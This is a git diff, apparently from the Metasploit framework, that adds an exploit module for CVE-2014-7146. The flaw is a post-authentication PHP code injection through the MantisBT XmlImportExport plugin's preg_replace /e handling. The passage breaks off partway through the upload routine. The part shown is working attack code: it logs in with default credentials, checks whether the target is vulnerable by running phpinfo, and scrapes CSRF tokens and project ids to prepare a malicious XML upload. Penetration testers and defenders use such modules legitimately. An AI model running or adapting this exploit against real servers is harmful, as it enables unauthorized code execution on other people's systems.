diff --git a/modules/exploits/multi/http/mantisbt_php_exec.rb b/modules/exploits/multi/http/mantisbt_php_exec.rb new file mode 100644 index 0000000000..9f80e82316 --- /dev/null +++ b/modules/exploits/multi/http/mantisbt_php_exec.rb @@ -0,0 +1,290 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'MantisBT XmlImportExport Plugin PHP Code Injection Vulnerability', + 'Description' => %q{ + This module exploits a post-auth vulnerability found in MantisBT versions 1.2.0a3 up to 1.2.17 when the Import/Export plugin is installed. + The vulnerable code exists on plugins/XmlImportExport/ImportXml.php, which receives user input through the "description" field and the "issuelink" attribute of an uploaded XML file and passes to preg_replace() function with the /e modifier. + This allows a remote authenticated attacker to execute arbitrary PHP code on the remote machine. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Egidio Romano', # discovery http://karmainsecurity.com + 'Juan Escobar ', # module development @itsecurityco + ], + 'References' => + [ + ['CVE', '2014-7146'] + ], + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => [['Generic (PHP Payload)', {}]], + 'DisclosureDate' => 'Nov 8 2014', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('USERNAME', [ true, 'Username to authenticate as', 'administrator']), + OptString.new('PASSWORD', [ true, 'Pasword to authenticate as', 'root']), + OptString.new('TARGETURI', [ true, 'Base directory path', '/']) + ], self.class) + end + + def check + res = exec_php('phpinfo(); die();', true) + + if res && res.body =~ /This program makes use of the Zend/ + return Exploit::CheckCode::Vulnerable + else + return Exploit::CheckCode::Unknown + end + end + + def do_login() + print_status('Checking access to MantisBT...') + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'login_page.php'), + 'vars_get' => { + 'return' => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import') + } + }) + + fail_with(Failure::NoAccess, 'Error accessing MantisBT') unless res && res.code == 200 + + session_cookie = res.get_cookies + + print_status('Logging in...') + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'login.php'), + 'cookie' => session_cookie, + 'vars_post' => { + 'return' => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import'), + 'username' => datastore['username'], + 'password' => datastore['password'], + 'secure_session' => 'on' + } + }) + + + fail_with(Failure::NoAccess, 'Login failed') unless res && res.code == 302 + + fail_with(Failure::NoAccess, 'Wrong credentials') unless res.redirection.to_s !~ /login_page.php/ + + "#{session_cookie} #{res.get_cookies}" + end + + def upload_xml(payload_b64, rand_text, cookies, is_check) + + if is_check + timeout = 20 + else + timeout = 3 + end + + rand_num = Rex::Text.rand_text_numeric(1, 9) + + print_status('Checking XmlImportExport plugin...') + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'plugin.php'), + 'cookie' => cookies, + 'vars_get' => { + 'page' => 'XmlImportExport/import' + } + }) + + unless res && res.code == 200 + print_error('Error trying to access XmlImportExport/import page...') + return false + end + + # Retrieving CSRF token + if res.body =~ /name="plugin_xml_import_action_token" value="(.*)"/ + csrf_token = Regexp.last_match[1] + else + print_error('Error trying to read CSRF token') + return false + end + + # Retrieving default project id + if res.body =~ /name="project_id" value="([0-9]+)"/ + project_id = Regexp.last_match[1] + else + print_error('Error trying to read project id') + return false + end + + # Retrieving default category id + if res.body =~ /name="defaultcategory">[.|\r|\r\n]*